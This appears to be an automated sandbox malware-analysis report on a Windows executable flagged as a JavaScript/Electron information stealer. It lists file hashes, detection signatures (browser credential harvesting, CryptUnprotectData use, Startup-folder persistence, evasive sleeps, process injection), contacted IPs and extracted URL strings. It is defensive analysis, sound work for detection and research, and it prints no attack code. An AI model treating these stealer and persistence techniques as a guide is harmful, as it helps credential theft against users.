Windows Analysis Report
SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe

Overview

General Information

Sample name: SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe
Analysis ID: 1417301
MD5: b691aa17712dea8153bdcaa3ffbdaca4
SHA1: 6ae217a6063c7a2f8cf33a53ecac633d85f5ba36
SHA256: 6235029d8dda63ac594132df856a367093c80f5a432b1b5a7c29d5601aab5af4
Tags: exe
Infos:

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Drops PE files to the startup folder
Drops large PE files
Tries to harvest and steal browser information (history, passwords, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FF846B64FEE CryptUnprotectData, 15_2_00007FF846B64FEE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00007FF846B84FEE CryptUnprotectData, 18_2_00007FF846B84FEE
Uses 32bit PE files
Source: SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\LICENSE.electron.txt Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\LICENSE.electron.txt Jump to behavior
Source: SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: elevate.exe.0.dr
Source: Binary string: C:\projects\src\out\Default\libGLESv2.dll.pdb source: libGLESv2.dll.0.dr
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\resources Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local Jump to behavior
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox View IP Address: 162.159.137.232 162.159.137.232
Source: Joe Sandbox View IP Address: 151.80.29.83 151.80.29.83
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.129.180
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.129.180
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.129.180
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.129.180
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.129.180
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown DNS traffic detected: queries for: chrome.cloudflare-dns.com
Source: unknown HTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/1085
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/1452
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/1452expandIntegerPowExpressionsThe
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/1512
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/1637
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/1936
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/2046
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/2152
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/2152skipVSConstantRegisterZeroIn
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/2162
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/2273
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/2517
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/2894
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/2970
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/2978
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3027
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3045
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3078
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3205
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3206
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3246
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3246allowClearForRobustResourceInitSome
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3452
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3498
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3502
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3577
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3584
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3586
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3623
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3624
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3625
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3682
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3682allowES3OnFL100Allow
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3729
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3832
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3862
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3965
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3970
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/3997
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/4214
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/4267
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/4324
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/4384
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/4405
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/4428
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/4551
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/4633
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/4646
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/4722
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/482
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/4836
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/4901
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/4937
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/5007
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/5007disableDrawBuffersIndexedDisable
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/5055
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/5061
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/5281
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/5371
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/5375
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/5421
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/5430
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/5469
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/5535
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/5577
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/5658
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/5658forceGlErrorCheckingForce
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/5750
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/5750forceRobustResourceInitForce-enable
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/5881
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/5901
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/5906
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/6041
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/6041forceInitShaderVariablesForce-enable
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/6048
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/6141
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/6248
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/6439
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/6651
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/6692
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/6755
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/6860
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/6876
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/6878
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/6929
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/6953
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/7036
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/7036Frontend
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/7047
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/7172
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/7279
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/7279cacheCompiledShaderEnable
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/7370
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/7406
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/7488
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/7527
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/7553
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/7556
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/7724
Source: libGLESv2.dll.0.dr String found in binary or memory: http://anglebug.com/7724disableAnisotropicFilteringDisable
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/1094869
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/110263
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/1144207
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/1165751
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/1165751disableProgramBinaryDisable
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/1171371
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/1181068
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/1181193
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/308366
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/403957
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/550292
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/565179
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/642227
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/642605
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/644669
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/650547
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/672380
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/709351
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/797243
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/809422
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/830046
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/849576
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/883276
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/927470
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/941620
Source: libGLESv2.dll.0.dr String found in binary or memory: http://crbug.com/941620allowTranslateUniformBlockToStructuredBufferThere
Source: elevate.exe.0.dr String found in binary or memory: http://int3.de/
Source: libGLESv2.dll.0.dr String found in binary or memory: http://issuetracker.google.com/200067929
Source: SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 0000000F.00000002.2450786406.0000014291D55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2436690487.00000142835D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2450786406.0000014291C12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B96A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2608970599.000001E0C7DD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2608970599.000001E0C7F14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000012.00000002.2565356773.000001E0B9620000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B946C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000F.00000002.2436690487.0000014281BA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B7D61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.2436690487.00000142832B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B946C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000012.00000002.2565356773.000001E0B9620000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B946C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000F.00000002.2436690487.0000014281BA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B7D61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://alekberg.net/privacy
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://alekberg.net/privacyalekberg.net
Source: libGLESv2.dll.0.dr String found in binary or memory: https://anglebug.com/4674
Source: libGLESv2.dll.0.dr String found in binary or memory: https://anglebug.com/4849
Source: libGLESv2.dll.0.dr String found in binary or memory: https://anglebug.com/5140
Source: libGLESv2.dll.0.dr String found in binary or memory: https://anglebug.com/5536
Source: libGLESv2.dll.0.dr String found in binary or memory: https://anglebug.com/5845
Source: libGLESv2.dll.0.dr String found in binary or memory: https://anglebug.com/7161
Source: libGLESv2.dll.0.dr String found in binary or memory: https://anglebug.com/7162
Source: libGLESv2.dll.0.dr String found in binary or memory: https://anglebug.com/7246
Source: libGLESv2.dll.0.dr String found in binary or memory: https://anglebug.com/7246enableCaptureLimitsSet
Source: libGLESv2.dll.0.dr String found in binary or memory: https://anglebug.com/7308
Source: libGLESv2.dll.0.dr String found in binary or memory: https://anglebug.com/7319
Source: libGLESv2.dll.0.dr String found in binary or memory: https://anglebug.com/7320
Source: libGLESv2.dll.0.dr String found in binary or memory: https://anglebug.com/7369
Source: libGLESv2.dll.0.dr String found in binary or memory: https://anglebug.com/7382
Source: libGLESv2.dll.0.dr String found in binary or memory: https://anglebug.com/7405
Source: libGLESv2.dll.0.dr String found in binary or memory: https://anglebug.com/7489
Source: libGLESv2.dll.0.dr String found in binary or memory: https://anglebug.com/7604
Source: libGLESv2.dll.0.dr String found in binary or memory: https://anglebug.com/7714
Source: libGLESv2.dll.0.dr String found in binary or memory: https://anglebug.com/7763
Source: libGLESv2.dll.0.dr String found in binary or memory: https://bugs.fuchsia.dev/p/fuchsia/issues/detail?id=107106
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://chrome-devtools-frontend.appspot.com/
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://chrome-devtools-frontend.appspot.com/%s%s/%s/NetworkResourceLoaderstreamWriteInspectableWebC
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://chrome.cloudflare-dns.com/dns-query
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryone.one.one.one1dot1dot1dot1.cloudflare-dns.com1.1.1.11.0
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr String found in binary or memory: https://chrome.google.com/webstore/category/extensions
Source: fr.pak.0.dr String found in binary or memory: https://chrome.google.com/webstore?hl=fr&category=theme81https://myactivity.google.com/myactivity/?u
Source: fr.pak.0.dr String found in binary or memory: https://chrome.google.com/webstore?hl=frRaccourci
Source: sw.pak.0.dr String found in binary or memory: https://chrome.google.com/webstore?hl=swUmeondoa
Source: zh-CN.pak.0.dr String found in binary or memory: https://chrome.google.com/webstore?hl=zh-CN
Source: zh-CN.pak.0.dr String found in binary or memory: https://chrome.google.com/webstore?hl=zh-CN&category=theme81https://myactivity.google.com/myactivity
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://chromium.dns.nextdns.io
Source: libGLESv2.dll.0.dr String found in binary or memory: https://chromium.googlesource.com/angle/angle/
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://cleanbrowsing.org/privacy
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://cleanbrowsing.org/privacyCleanBrowsing
Source: powershell.exe, 00000012.00000002.2608970599.000001E0C7F14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000002.2608970599.000001E0C7F14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000002.2608970599.000001E0C7F14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: libGLESv2.dll.0.dr String found in binary or memory: https://crbug.com/1042393
Source: libGLESv2.dll.0.dr String found in binary or memory: https://crbug.com/1046462
Source: libGLESv2.dll.0.dr String found in binary or memory: https://crbug.com/1060012
Source: libGLESv2.dll.0.dr String found in binary or memory: https://crbug.com/1091824
Source: libGLESv2.dll.0.dr String found in binary or memory: https://crbug.com/1137851
Source: libGLESv2.dll.0.dr String found in binary or memory: https://crbug.com/1300575
Source: libGLESv2.dll.0.dr String found in binary or memory: https://crbug.com/593024
Source: libGLESv2.dll.0.dr String found in binary or memory: https://crbug.com/593024selectViewInGeometryShaderThe
Source: libGLESv2.dll.0.dr String found in binary or memory: https://crbug.com/650547
Source: libGLESv2.dll.0.dr String found in binary or memory: https://crbug.com/650547callClearTwiceUsing
Source: libGLESv2.dll.0.dr String found in binary or memory: https://crbug.com/655534
Source: libGLESv2.dll.0.dr String found in binary or memory: https://crbug.com/655534useSystemMemoryForConstantBuffersCopying
Source: libGLESv2.dll.0.dr String found in binary or memory: https://crbug.com/705865
Source: libGLESv2.dll.0.dr String found in binary or memory: https://crbug.com/710443
Source: libGLESv2.dll.0.dr String found in binary or memory: https://crbug.com/811661
Source: libGLESv2.dll.0.dr String found in binary or memory: https://crbug.com/848952
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/Cloudflare
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://developers.google.com/speed/public-dns/privacy
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://developers.google.com/speed/public-dns/privacyGoogle
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://dns.google/dns-query
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://dns.quad9.net/dns-query
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://dns.quad9.net/dns-querydns.quad9.netdns9.quad9.net9.9.9.9149.112.112.1122620:fe::fe2620:fe::
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://dns.sb/privacy/
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://dns.sb/privacy/DNS.SBhttps://doh.dns.sb/dns-query
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://dns10.quad9.net/dns-query
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://dns10.quad9.net/dns-querydns10.quad9.net9.9.9.10149.112.112.102620:fe::102620:fe::fe:10
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://dns11.quad9.net/dns-query
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://dns11.quad9.net/dns-querydns11.quad9.net9.9.9.11149.112.112.112620:fe::112620:fe::fe:11Pd4
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://dns64.dns.google/dns-query
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://dnsnl.alekberg.net/dns-query
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://doh-01.spectrum.com/dns-query
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://doh-02.spectrum.com/dns-query
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://doh.cleanbrowsing.org/doh/adult-filter
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://doh.cleanbrowsing.org/doh/family-filter
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://doh.cleanbrowsing.org/doh/security-filter
